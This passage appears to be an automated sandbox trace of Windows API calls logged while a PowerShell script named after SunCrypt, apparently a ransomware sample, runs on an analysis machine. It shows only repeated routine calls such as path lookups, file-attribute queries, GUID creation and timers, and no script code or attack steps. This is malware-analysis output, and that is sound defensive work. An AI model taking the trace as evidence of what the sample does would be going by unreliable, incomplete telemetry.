lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701081294399) returned 1 [0097.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.996] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0097.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0097.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.003] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701081942601) returned 1 [0098.066] EtwEventActivityIdControl () returned 0x0 [0098.088] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2d2350 [0098.176] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2d23d8 [0098.182] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9ce3a19c, Data2=0x7098, Data3=0x45bd, Data4=([0]=0x8e, [1]=0xf8, [2]=0xd2, [3]=0x8e, [4]=0xd7, [5]=0xf8, [6]=0x7f, 
[7]=0x1a))) returned 0x0 [0098.183] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0098.183] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0098.183] CoTaskMemFree (pv=0x4272d90) [0098.183] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701099962409) returned 1 [0098.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0098.183] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0098.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0098.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, 
lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.186] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701100243708) returned 1 [0098.186] EtwEventActivityIdControl () returned 0x0 [0098.186] EtwEventActivityIdControl () returned 0x0 [0098.186] EtwEventActivityIdControl () returned 0x0 [0098.499] EtwEventActivityIdControl () returned 0x0 [0098.499] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x43052924, Data2=0x87b4, Data3=0x49d8, Data4=([0]=0xbb, [1]=0x38, [2]=0xd8, [3]=0x83, [4]=0x84, [5]=0xbf, [6]=0x6e, [7]=0xfb))) returned 0x0 [0098.499] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0098.499] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0098.500] CoTaskMemFree (pv=0x4272d90) [0098.500] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701132114273) returned 1 [0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0098.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0098.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.507] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701132382396) returned 1 [0098.507] EtwEventActivityIdControl () returned 0x0 [0098.507] EtwEventActivityIdControl () returned 0x0 [0098.507] EtwEventActivityIdControl () returned 0x0 [0098.508] EtwEventActivityIdControl () returned 0x0 [0098.508] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xa0044f9, Data2=0xc649, Data3=0x4034, Data4=([0]=0xbd, [1]=0x30, [2]=0x7e, [3]=0x16, [4]=0x5c, [5]=0x3b, [6]=0xeb, [7]=0xcc))) returned 0x0 [0098.508] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0098.508] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0098.509] CoTaskMemFree (pv=0x4272d90) [0098.509] EtwEventActivityIdControl () returned 0x0 [0098.509] EtwEventActivityIdControl () returned 0x0 [0098.509] EtwEventActivityIdControl () returned 0x0 [0098.509] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701132588110) returned 1 [0098.509] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0098.510] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0098.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0098.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.515] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701133140746) returned 1 [0098.515] EtwEventActivityIdControl () returned 0x0 [0099.129] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xfa31722c, Data2=0xaa9e, Data3=0x41a0, 
Data4=([0]=0x98, [1]=0x4b, [2]=0x48, [3]=0x8, [4]=0x19, [5]=0x7, [6]=0xe1, [7]=0x10))) returned 0x0 [0099.129] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.129] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.129] CoTaskMemFree (pv=0x427a048) [0099.129] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701194599303) returned 1 [0099.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0099.130] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0099.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.130] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.132] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701195041852) returned 1 [0099.134] EtwEventActivityIdControl () returned 0x0 [0099.134] EtwEventActivityIdControl () returned 0x0 [0099.135] EtwEventActivityIdControl () returned 0x0 [0099.138] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x589486fb, Data2=0xe31c, Data3=0x43e0, Data4=([0]=0x99, [1]=0x19, [2]=0xc7, [3]=0x87, [4]=0x7c, [5]=0x82, [6]=0xc9, [7]=0x6b))) returned 0x0 [0099.139] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.139] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.139] CoTaskMemFree (pv=0x427a048) [0099.140] EtwEventActivityIdControl () returned 0x0 [0099.140] EtwEventActivityIdControl () returned 0x0 [0099.140] EtwEventActivityIdControl () returned 0x0 [0099.141] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701195744664) returned 1 [0099.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0099.141] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0099.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.142] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.147] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701196348801) returned 1 [0099.209] EtwEventActivityIdControl () returned 0x0 [0099.324] EtwEventActivityIdControl () returned 0x0 [0099.324] EtwEventActivityIdControl () returned 0x0 [0099.324] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa1e5d89c, Data2=0xdcb3, Data3=0x44b7, Data4=([0]=0x9a, [1]=0xe4, [2]=0xc8, [3]=0xbf, [4]=0xa6, [5]=0x9c, [6]=0xc5, [7]=0xf))) returned 0x0 [0099.324] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.324] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.324] CoTaskMemFree (pv=0x427a048) [0099.324] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701214094015) returned 1 [0099.324] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.324] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0099.325] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0099.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.327] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701214374873) returned 1 [0099.327] EtwEventActivityIdControl () returned 0x0 [0099.327] EtwEventActivityIdControl () returned 0x0 [0099.327] EtwEventActivityIdControl () returned 0x0 
[0099.328] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0xd7f656f4, Data2=0x611, Data3=0x4899, Data4=([0]=0x99, [1]=0x3c, [2]=0x4d, [3]=0x6b, [4]=0x81, [5]=0x5c, [6]=0x2c, [7]=0x83))) returned 0x0 [0099.328] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.328] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.328] CoTaskMemFree (pv=0x427a048) [0099.329] EtwEventActivityIdControl () returned 0x0 [0099.329] EtwEventActivityIdControl () returned 0x0 [0099.329] EtwEventActivityIdControl () returned 0x0 [0099.329] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701214581675) returned 1 [0099.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0099.329] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 
[0099.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.332] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701214849092) returned 1 [0099.427] EtwEventActivityIdControl () returned 0x0 [0099.542] EtwEventActivityIdControl () returned 0x0 [0099.542] EtwEventActivityIdControl () returned 0x0 [0099.943] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x3c5747ee, Data2=0x8568, Data3=0x485e, Data4=([0]=0x96, [1]=0x1c, [2]=0x8, [3]=0x1d, [4]=0x2f, [5]=0xff, [6]=0x6, [7]=0x4a))) returned 0x0 [0099.943] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0099.943] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0099.943] CoTaskMemFree (pv=0x427a048) [0099.943] EtwEventActivityIdControl () returned 0x0 [0099.943] EtwEventActivityIdControl () returned 0x0 [0099.944] EtwEventActivityIdControl () returned 0x0 [0099.944] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701276066197) returned 1 [0099.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) 
returned 0x3a [0099.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0099.944] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0099.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0099.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0099.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0099.949] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701276603465) returned 1 [0100.191] EtwEventActivityIdControl () returned 0x0 [0100.438] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x76c08305, Data2=0x80be, Data3=0x492b, Data4=([0]=0xb9, [1]=0xeb, [2]=0xc0, [3]=0x73, [4]=0xb, [5]=0xc1, [6]=0x2b, [7]=0x6a))) returned 